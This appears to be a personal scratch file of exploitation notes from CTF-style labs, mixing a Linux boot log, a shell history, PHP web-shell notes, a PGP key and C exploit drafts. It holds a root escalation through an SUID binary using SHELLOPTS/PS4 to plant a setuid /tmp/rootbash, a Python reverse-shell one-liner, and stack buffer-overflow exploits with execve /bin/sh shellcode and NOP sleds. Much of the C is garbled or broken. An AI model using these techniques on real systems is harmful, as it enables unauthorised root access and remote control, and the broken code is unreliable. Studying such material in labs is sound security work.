1379Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1380Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1381Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1382Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1383Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1384Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1385Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1386Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1387Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1388Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1389Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1390Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1391Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1392Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1393Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1394Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1395Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1396Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1397Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1398Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1399Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1400Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1401Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1402Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1403Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1404Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1405Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1406Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1407Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1408Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1409Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1410Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1411Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1412Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1413Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1414Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1415Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1416Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1417Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1418Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1419Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1420Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1421Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1422Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1423Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1424Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1425Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1426Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1427Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1428Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1429Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1430Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1431Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1432Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1433Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1434rootbash-4.1# history | tail -100
1435 115 ls
1436 116 cat /etc/hosts.allow
1437 117 arp -A
1438 118 arp
1439 119 arp -vpn
1440 120 arp -vn
1441 121 netstat -A
1442 122 netstat -r
1443 123 netstat -i
1444 124 netstat -g
1445 125 netstat -e
1446 126 netstat -l
1447 127 netstat
1448 128 man netstat
1449 129 netstat -tcp
1450 130 netstat -udp
1451 131 netstat -p tcp
1452 132 netstat -p udp
1453 133 netstat -p tcp 22
1454 134 netstat -p 22
1455 135 netstat -p 80
1456 136 netstat -p tcp
1457 137 netstat -p udp
1458 138 ls
1459 139 clear
1460 140 dmesg | grep /var/log
1461 141 dmesg | grep /var/log/messages.log
1462 142 cd /var/log
1463 143 ls
1464 144 dmesg | grep /var/log/syslog | less
1465 145 dmesg | grep /var/log/syslog | more
1466 146 dmesg | grep /var/log/syslog
1467 147 ls -la /var/log/syslog
1468 148 chmod 755 /var/log/syslog
1469 149 ls -la /var/log/syslog
1470 150 ls
1471 151 tail -f /var/log/syslog
1472 152 tail -f /var/log/syslog | more
1473 153 dmesg | grep /var/log/syslog > w0rd.txt
1474 154 cat w0rd.txt
1475 155 ls
1476 156 chmod 755 w0rd.txt
1477 157 ls
1478 158 cat w0rd.txt
1479 159 ls -la w0rd.txt
1480 160 rm -f w0rd.txt
1481 161 ls
1482 162 cat /var/log/syslog
1483 163 cat /var/log/syslog | less foo.txt
1484 164 cat /var/log/syslog | grep /usr/local/bin
1485 165 cat /var/log/syslog | grep /tmp
1486 166 cat /var/log/syslog | grep /rootbash
1487 167 ls
1488 168 cat /var/log/syslog
1489 169 ls
1490 170 dmesg /var/log/auth.log.2.gz
1491 171 cat /var/log/wtmp
1492 172 cat /var/run/utmp
1493 173 who am i
1494 174 users
1495 175 last
1496 176 finger
1497 177 cat /var/log/secure
1498 178 cat /var/log/auth.log
1499 179 head -5 /var/log/auth.log
1500 180 fc -l -10
1501 181 nano .bash_history
1502 182 history 100
1503 183 ls -la
1504 184 who am i
1505 185 cd /
1506 186 ls
1507 187 cd /home
1508 188 ls
1509 189 cd user/
1510 190 ls
1511 191 cd ..
1512 192 ls
1513 193 cat /etc/passwd
1514 194 cat /etc/shadow
1515 195 exit
1516 196 /usr/local/bin/suid-env2
1517 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1518 198 /tmp/rootbash -p
1519 199 exit
1520 200 cls
1521 201 exit
1522 202 ls
1523 203 cd tools
1524 204 ls
1525 205 /tmp/rootbash -p
1526 206 exit
1527 207 su newroot
1528 208 whoami
1529 209 cat /etc/passwd
1530 210 su root
1531 211 exit
1532 212 tail -f /var/log/messages
1533 213 cat /var/log/messages
1534 214 history | tail -100
1535rootbash-4.1# id
1536uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1537rootbash-4.1# whoami
1538root
1539rootbash-4.1# ls -la /home/user/bmillakid
1540rootbash-4.1# cd /home
1541rootbash-4.1# ls
1542user
1543rootbash-4.1# cd user
1544rootbash-4.1# ls
1545l33t.txt myvpn.ovpn tools
1546rootbash-4.1#
1547
1548
1549
1550
1551
1552
1553
1554
1555
1556
1557
1558
1559
1560
1561
1562
1563
15641. Checking if the parameter "commandString" is set
1565
15662. If it is, then the variable $command_string gets what was passed into the input field
1567
15683. The program then goes into a try block to execute the function passthru($command_string). You can read the docs on passthru() on PHP's website, but in general, it is executing what gets entered into the input then passing the output directly back to the browser.
1569
15704. If the try does not succeed, output the error to page. Generally this won't output anything because you can't output stderr but PHP doesn't let you have a try without a catch.
1571
1572
1573
1574reverse shell
1575http://10.10.202.91:8888/
1576/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1577ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1578
1579
1580
1581
1582?noot=1 -1
1583
1584
1585ThereIsMoreToXSSThanYouThink
1586
1587ReflectiveXss4TheWin
1588
1589----BEGIN PGP PUBLIC KEY BLOCK-----
1590Comment: https://keybase.io/download
1591Version: Keybase Go 5.6.0 (windows)
1592
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
1639JSU4mVKnCAZggCAq8fryKPS+TIFmLGc=
1640=QLLF
1641-----END PGP PUBLIC KEY BLOCK-----
1642
1643#include <stdlib.h>
1644
1645#define offset_size 0
1646#define buffer-size 600
1647
1648char sc[] =
1649"\xc0\xf2\x03\x42" //system()
1650"\x02\x9b\xb0\x42" //exit()
1651"\xa0\x8a\xb2\x42" //binsh
1652
1653unsigned llong find_start(void) {
1654
1655 __asm__("mov1 %esp,%eax");
1656}
1657
1658int main(int argc, char *argv[])
1659{
1660
1661 char *buff, *ptr;
1662 long *addr_ptr, addr;
1663 int offset=offset_size, bsize=buffer_size;
1664 int i;
1665
1666 if (argc > 1) bsize = atoi(argv[1]);
1667 if (argc > 2) offset = atoi(argv[2]);
1668
1669 addr = find_start() -offset;
1670 ptr = buff;
1671 addr_ptr= (long *) ptr;
1672 for (i = 0; i < bsize; i+=4)
1673 *(addr_ptr++) =addr;
1674
1675 ptr +=4;
1676
1677 for (i = 0; i < strlen(sc); i++)
1678 *(ptr++) =sc[i];
1679
1680buff[bsize -1] = '\0';
1681
1682memcpy(buff,"BUF=",4);
1683putenv(buff);
1684system("/bin/bash");
1685
1686}
1687
1688
1689specific syscall number is loaded into eax
1690syscall function placed into other Registers
1691instruction int 0x80 is executed
1692CPU switches to kernel mode
1693syscall function is executed
1694
1695//shell.c
1696int main() {
1697 char *name[2];
1698
1699 name[0] = "/bin/sh";
1700 name[1] = 0x0;
1701 execve(name[0], name, 0x0);
1702 exit (0);
1703 }
1704
1705
1706//shellcode.c
1707char shellcode[] =
1708“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1709
1710int main()
1711{
1712
1713 int = (int *)&ret +2;
1714 (*ret) = (int)shellcode;
1715
1716}
1717
1718[ask application to force input, causing the address we supplised to be loaded into EP
1719,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1720
1721when RET is popped off the stack and loaded into EIP the first instruction is executed of the shellcode
1722
1723
1724Location pointer
1725
1726// find_start.c
1727unsigned long find_start(void)
1728{
1729
1730 __asm__("move1 %esp, %eax");
1731
1732}
1733
1734int main()
1735{
1736
1737 printf("0x%n\n",find_start());
1738}
1739
1740[putting programs into arranys with no bounds checking ]
1741 [has to be owned by root in suid]
1742
1743sudo chown root victim
1744sudo chmod +s victim
1745
1746./victim <shellcode>padding>choice-of-returnaddress
1747
1748./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
1749
1750./victim $(printf "%0512x" 0)
1751./victim $(printf %0516x" 0)
1752./victim $(printf %0520x" 0)
1753./victim $(printf %0524x" 0)
1754Segfault
1755./victim $(printf %0528x" 0)
1756Segfault
1757[we can tell the saved return address is probably 524-528 bytes
1758shellcode = [40]
1759padding = [480]
1760saved ret address [0xbffffad8]
1761
1762./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
1763[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
1764
1765[little indian]
1766
1767./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
1768Illegal instruction
1769
17708%0484x\x38\xfa\xff\xbf")
1771
1772[program to guess offset between start of the program and first instruction for shellcode]
1773
1774#include <stdlib.h>
1775
1776#define offset_size 0
1777#define buffer_size 512
1778
1779
1780char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1781
1782unsigned long find_start(void) {
1783
1784 __asm__(*mov1 %esp,%eax");
1785
1786}
1787
1788int main(int argc, char *argv[])
1789{
1790
1791 char *buff, *ptr;
1792 long *addr_ptr, addr;
1793 int offset=offset_size, bsize=buffer_size;
1794 int i;
1795
1796 if (argc > 1) bsize = atoi(argv[1]);
1797 if (argc > 2) offset = atoi(argv[2]);
1798
1799 addr = find_start() - offset;
1800 printf("attempt address: 0x%n\n",addr);
1801
1802 ptr = buff;
1803 addr_ptr =(long *) ptr;
1804 for (i - 0; i < bsize; i+=4)
1805 * (addr_ptr++) = addr;
1806
1807 ptr +=4;
1808
1809 for (i = 0; i < strlen(sc); i++)
1810 *(ptr++) = sc[i];
1811
1812 buff[bsize - 1] = '\0';
1813
1814 memcpy(buff, "BUF=",4);
1815 putenv(buff);
1816 system(" /bin/bash");
1817
1818}
1819
1820
1821[NOP]
1822
1823
1824
1825#include <stdlib.h>
1826
1827#define DEFAULT_OFFSET 0
1828#define DEFAULT_BUFFER_SIZE 512
1829#define NOP 0x90
1830
1831
1832 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
1833\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
1834
1835unsigned long get_sp(void) {
1836 __asm__("mov1 %esp,%eax");
1837}
1838
1839void main(int argc, char *argv[])
1840
1841{
1842
1843 char *buff, *ptr;
1844
1845 long *addr_ptr, addr;int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;int i;if (argc > 1) bsize = atoi(argv[1]);if (argc > 2) offset = atoi(argv[2]);if (!(buff = malloc(bsize))) {printf(“Can’t allocate memory.\n”);exit(0);}addr = get_sp() - offset;printf(“Using address: 0x%x\n”, addr);ptr = buff;addr_ptr = (long *) ptr;for (i = 0; i < bsize; i+=4)*(addr_ptr++) = addr;for (i = 0; i < bsize/2; i++)buff[i] = NOP;ptr = buff + ((bsize/2) - (strlen(shellcode)/2));for (i = 0; i < strlen(shellcode); i++)*(ptr++) = shellcode[i];buff[bsize - 1] = ‘\0’;memcpy(buff,”BUF=”,4);putenv(buff);system(“/bin/bash”);}
1846
1847
1848